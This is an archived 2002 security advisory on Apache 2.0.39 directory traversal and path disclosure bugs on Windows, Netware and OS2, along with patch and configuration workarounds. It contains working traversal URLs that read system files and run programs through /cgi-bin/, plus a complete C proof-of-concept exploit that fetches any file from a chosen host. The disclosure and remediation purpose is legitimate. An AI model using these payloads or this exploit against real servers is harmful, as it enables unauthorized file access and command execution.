Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apache :: web5638.htm

Apache directory traversal and path disclosure bug



16th Aug 2002 [SBWID-5638]
COMMAND

	Apache directory traversal and path disclosure bug

SYSTEMS AFFECTED

	Apache  version  2.0.39  and  previous  2.0.x,  ONLY  on  systems   that
	supportsbackslash path delimiters (Win/Netware/OS2 etc...)

PROBLEM

	Auriemma Luigi [aluigi@pivx.com], Security  Researcher,  PivX  Solutions
	[http://www.PivX.com], LLC posted :
	

	 1) Introduction

	

	The bug I have found about the directory traversal can be classified  as
	a high risk bug and the path disclosure as a low risk.  With  the  first
	bug an attacker can see every file in the system and  execute  it  using
	the /cgi-bin/ path. The bug was shown to the Apache Group  some  minutes
	after it's being discovered. The bug was quickly fixed. The  second  bug
	instead is a simple path disclosure bug, useful for obtaining more  info
	about the server (important if the administrator hide some information)
	

	 - IMPORTANT NOTE -

	

	The ASF recommends all Win32, Netware and OS2 users immediately  upgrade
	to the 2.0.40 or, temporary, apply the fix suggested in the Fix  section
	of this advisory. It is also suggested  that  any  of  the  un*x-flavors
	also  should   consider   upgrading   to   2.0.40   to   eliminate   the
	path-revealing bugs that apply to all versions.
	

	 2) Bug

	

	 A) CAN-2002-0654

	 ----------------

	

	The bug is not dangerous because it does not give remote access  to  the
	system or other data accesses but  for  an  attacker  it  is  useful  in
	gathering  detaild  information  about  the  server  to   launch   other
	malicious attacks. With this bug we can see the  path  where  Apache  is
	installed, so we can know if the server run on a Windows machine, if  it
	is the second version of  Apache  (Apache2)  and  naturally  the  server
	version (all of  the  the  info  is  useful  if  the  administrator  has
	obscured the Server field or other info about the server, so if the  bug
	is present, we know for example that the Apache installed is  a  version
	prior the 2.0.40).
	

	However let's go with the example.
	

	From the browser we must insert the following string:
	

	http://127.0.0.1/error/HTTP_NOT_FOUND.html.var

	

	Then the server will answer with this page:
	

	|Not Acceptable

	|

	|An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could not be found on this server.

	|Available variants:

	|

	| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de

	| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en

	| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es

	| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr

	

	As we can see, the server answer with the full path of the file we  have
	requested. We can request all the files .var in the error folder and  we
	will have the same result.
	

	More detailed info can be found on the Apache website
	

	http://httpd.apache.org

	

	

	 B) CAN-2002-0661 

	 ----------------

	

	The problem is in the management of the bad chars that can  be  used  to
	launch some attacks, such  as  the  directory  traversal.  In  fact  the
	backslash char ('' == %5c) is not checked as a bad char, so  it  can  be
	used for seeking the directories of  systems  that  use  it  as  a  path
	delimiter (Windows, Netware, OS2 and others).
	

	Then another problem is that the attacker can execute  commands  on  the
	remote host simply using the /cgi-bin/ path.
	

	The following are two simple examples.
	

	for view the file winntwin.ini:
	

	http://127.0.0.1/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

	

	for run the wintty utility in the Apache2/bin folder:
	

	http://127.0.0.1/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO

	

	In human readable form, they mean:
	

	http://127.0.0.1/error/........winntwin.ini http://127.0.0.1/cgi-bin/..binwintty.exe?-t+HELLO

	

	So in the first example we go  down  to  the  root  path  with  ........
	because we are in "c:program filesApache GroupApache2error". Instead  in
	the second example we use the /cgi-bin/ path and we pass arguments  with
	"file.exe?arg1+arg2+arg3+...".
	

	 3) The Code

	 

	Look the examples in section 2.
	

	 Update (29 August 2002)

	 ======

	

	/*

	 * DSR-apache2.0x by bob@dtors.net

	 * Exploit found by Auriemma Luigi.

	 * 

	 * This is Proof on Concept exploit for

	 * the current directory traversal design flaw 

	 * in apache 2.0.x - 2.0.39.

	 * 

	 * Affected Systems:

	 *

	 * Windows [win32]

	 * Netware

	 * OS2

	 * Cygwin

	 *

	 * This exploit allows the attacker to view ANY

	 * file on the target machine if it is vulnerable

	 * to this attack.

	 *

	 */

	

	#include <stdio.h>

	#include <unistd.h>

	#include <string.h>

	#include <sys/socket.h>

	#include <netinet/in.h>

	#include <netdb.h>

	#define bs "%5c"

	char travcode[]= 

				"\x25\x35\x63\x25\x32\x65\x25\x32\x65"

				"\x25\x35\x63\x25\x32\x65\x25\x32\x65"

				"\x25\x35\x63\x25\x32\x65\x25\x32\x65"

				"\x25\x35\x63\x25\x32\x65\x25\x32\x65"

				"\x25\x35\x63\x25\x32\x65\x25\x32\x65"

				"\x25\x35\x63";

	

	

	void reply(int sock);

	

	

	void reply(int sock) 

	{

	

	

	int n;

	char recvbuf[1024];

	fd_set rset;

	  

	         

	  while (1) {

	    FD_ZERO(&rset);

	    FD_SET(sock,&rset);

	    FD_SET(STDIN_FILENO,&rset);

	    select(sock+1,&rset,NULL,NULL,NULL);

	

	    if (FD_ISSET(sock,&rset)) {

	      if((n=read(sock,recvbuf,1024)) <= 0) {

	        printf("Connection closed by foreign ghost.\n");

	        exit(0);

	      }         

	

	      recvbuf[n]=0;

	      printf("%s",recvbuf);

	    }                      

	

	    if (FD_ISSET(STDIN_FILENO,&rset)) {

	      if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {

	        recvbuf[n]=0;

	       //write(sock,recvbuf,n);

	      }

	    }

	  }

	}

	

	

	

	int main(int argc, char *argv[]) {

	

	int sock;

	char exp[1024];

	struct in_addr addr;

	struct sockaddr_in sin;

	struct hostent *he;

	 

	

	fprintf(stdout, "\n\tDSR-apache2.0x.c By bob.\n"); 

	fprintf(stdout, "Proof Of Concept Code for Apache 2.0.x 2.0.39\n");

	fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n");

	 

	if(argc<4) 

	  {

	   fprintf(stderr, "\nUsage : %s <host> <dir> <file>\n\n", argv[0]);

	   exit(1);

	  } 

	

	 

	

	if ((he=gethostbyname(argv[1])) == NULL)

	   {

	   fprintf(stderr, "Cumon! Gimme some socks to put on!\n\n");

	   exit(1);

	   }

	

	/* A fresh pair of clean socks ;) */

	

	sock=socket(AF_INET, SOCK_STREAM, 0);

	bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);

	sin.sin_family=AF_INET;

	sin.sin_port=htons(80);

	

	/* yummy fresh smelling */

	

	fprintf(stdout, "Hold up bish connecting to host... \n");

	if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)

	     {

	     fprintf(stderr, "My socks are all sweaty.\n");

	     exit(1);

	     }

	

	else {

	/* im exhausted after that...gn */

	sleep(3);

	

	

	

	sprintf(exp, "GET /error/%s%s%s%s HTTP/1.1\r\nHost: %s\r\n\r\n" ,travcode, argv[2], bs, argv[3], argv[1]);    

	write(sock,exp,strlen(exp));

	

	fprintf(stdout, "This is not going to be pritty.\nIm a lion here me ROAR!\n\n");

	reply(sock);

	

	close(sock);

	exit (0);

	

	}

	

	}

	

	

SOLUTION

	 Patch

	 =====

	

	Apache 2.0.40 from Apache website (http://httpd.apache.org)
	

	 Workaround

	 ==========

	

	However this is a simple workaround suggested by the  Apache  Group  for
	the directory traversal  bug:  A  simple  one  line  workaround  in  the
	httpd.conf file will disallow the  vulnerability.  Prior  to  the  first
	'Alias' or 'Redirect' directive, add  the  following  directive  to  the
	global server configuration:
	

	RedirectMatch 400 "\.."

	

	

	 -Also-

	

	William A. Rowe, Jr. comments :
	

	In Auriemma's the first example, a normal 'Alias' is used to bypass  the
	document root, (the alias-to  the  error  docs  location),  and  in  the
	second  case,  the  'ScriptAlias'  is  used,  which  also   forces   the
	cgi-script handler.
	

	In a properly secured server, the following will  prevent  the  examples
	above;
	

	   <Directory />

	     Options FollowSymLinks

	     AllowOverride None

	     Order deny,allow

	     Deny from all

	   </Directory>

	

	This protection will refuse  to  serve  any  directories  that  are  not
	explicitly permitted by their own overriding <Directory > blocks.  Of
	course, all <Directory > blocks containing web content  will  require
	the following lines (or similar) to permit access as desired...
	

	   Order allow,deny

	   Allow from all

	

	However, ScriptAlias circumvents the Options ExecCGI, so  the  following
	would still work in the usual configuration;
	

	   http://127.0.0.1/cgi-bin/%5c%2e%2e%5chtdocs%5cindex.html.en

	

	which invokes htdocsindex.html.en as a script.  Not  useful,  certainly,
	but other more sinister purposes could be invented.
	

	As a further safety precaution, using the Alias  directive  in  lieu  of
	the ScriptAlias directive. The following structure will close the  third
	example vulnerability;
	

	   Alias /cgi-bin/ "/Path-to-Apache2/cgi-bin/"

	

	   <Directory "/Path-to-Apache2/cgi-bin/">

	     AllowOverride None

	     Options ExecCGI

	     Order allow,deny

	     Allow from all

	     SetHandler cgi-script

	   </Directory>

	

	which only enables script execution in the given directory, and  not  as
	a consequence of ScriptAlias translation.
	

	Finally, it may be desirable not to use the  SetHandler  directive,  but
	instead call out each and every AddHandler cgi-script  pl  cgi  ...  and
	all other permitted cgi files or file types.
	

	A more complete report will be prepared and distributed  by  the  Apache
	HTTP project. Follow the project's guidance for all Win32, OS2,  Netware
	and Cygwin Apache 2.0.x servers (prior to .40), and add the:
	

	   RedirectMatch 400 "\.."

	

	escape  in  the  global  server  context   (right   after   the   global
	DocumentRoot directive would the the safest place to assure  it  is  the
	first evaluated RedirectMatch directive.) Then upgrade to Apache  2.0.40
	on any of those platforms.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH